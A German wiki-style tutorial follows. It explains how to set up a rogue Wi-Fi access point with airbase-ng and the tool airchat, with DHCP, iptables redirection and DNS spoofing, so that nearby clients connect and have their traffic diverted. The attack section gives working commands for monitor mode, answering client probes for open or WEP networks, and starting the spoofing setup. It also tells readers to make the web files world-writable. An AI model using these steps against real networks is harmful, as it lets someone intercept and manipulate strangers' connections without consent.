In diesem kleinen Tutorial zeige ich, wie ihr einen AP aufsetzt und mit airchat den Traffic umleitet. Dieser Text richtet sich an erfahrende User und wurde für das Betriebssystem Debian geschrieben. Wenn du ein anderes System verwendest, können Befehle von diesem Tutorial abweichen.

[Bearbeiten] Vorraussetzungen

• HTTP-Server wie z.B. lighttpd mit PHP
• Aircrack-ng Suite (aktuelle Version aus der SVN)
• dsniff
• DHCP-Server (dhcpd3)

Die Programme sind in den Repos der meisten Distributionen vorhanden.

[Bearbeiten] Installation

[Bearbeiten] Download

Man kann die aktuelleste Version von http://svn.gnoxter.ath.cx/airchat/trunk/ herunterladen, oder wenn der Server nicht online ist, aus diesem Thread: https://wardriving-forum.de/forum/showthread.php?t=66648

[Bearbeiten] Konfiguration

In der Konfiguration von dhcpd3 fügt ihr oben folgendes ein:

 /etc/dhcp3/dhcpd.conf

 option domain-name-servers 208.67.222.222, 208.67.220.220;
 default-lease-time 60; max-lease-time 72;
 ddns-update-style none;
 authoritative;
 log-facility local7;
 subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254;
 option routers 10.0.0.1; option domain-name-servers 208.67.222.222,
 208.67.220.220 ; }

Kopiert den Inhalt von /airchat-webchat/ in den documentRoot eures Webservers. Dann geht ihr in der Konsole in den DocumentRoot und gebt folgendes ein:

chmod 777 *.csv

Als letztes müssen wir einen Umleitung für 404 Codes auf die index.php setzen:

server.error-handler-404  = "/index.php"

Damit wird der Chat funktionsfähig gemacht. Wenn ihr "localhost" in euren Browser eingebt, könnt ihr sehen ob alles funktioniert.

Geht jetzt wieder in den Airchat-Ordner. Dort kompilliert ihr airchat mit folgenden Befehl:

gcc -o  airchat-0.X airchat-0.X.c

• Das X steht für die Version

[Bearbeiten] Attacke starten

[Bearbeiten] W-Lan Karte in den Monitor Mode setzen und airbase-ng starten

Als erstes versetzt ihr eure Karte in den Monitor Mode z.B. mit

 airmon-ng start wlan0

Dannach muss airbase gestartet werden. Hier gibt es mehrere Möglichkeiten:

 airbase-ng -c 1 -P -C 60  mon0

 airbase-ng -c 1 -P -C 60 -W 1 mon0

Der erste Befehl lässt airbase-ng nach Probes von unverschlüsselten Netzwerken lauschen. Die zweite Option lässt airbase-ng nach WEP Probes lauschen. Alternativ könnt ihr eure eigene Konfiguration basteln.

man airbase-ng 

gibt euch genügend Informationen.

[Bearbeiten] Airchat starten

Öffnet eine neue Shell und geht in den airchat-Ordner. Mit

./airchat-0.X

startet ihr airchat. Mit der ersten Option startet ihr den DHCP-Server, setzt die IPtables und den DNS Spoofer. Jetzt müsst ihr nur auf connectende Clients warten. Über den localhost könnt ihr dan mit ihnen chatten. Wenn ihr die Attacke stoppen wollt, dann drückt STRG-C und wählt dann Option 3. Dadurch wird der DHCP-Server gestoppt, die temporären Files und die IPtables gelöscht.

Viel Spaß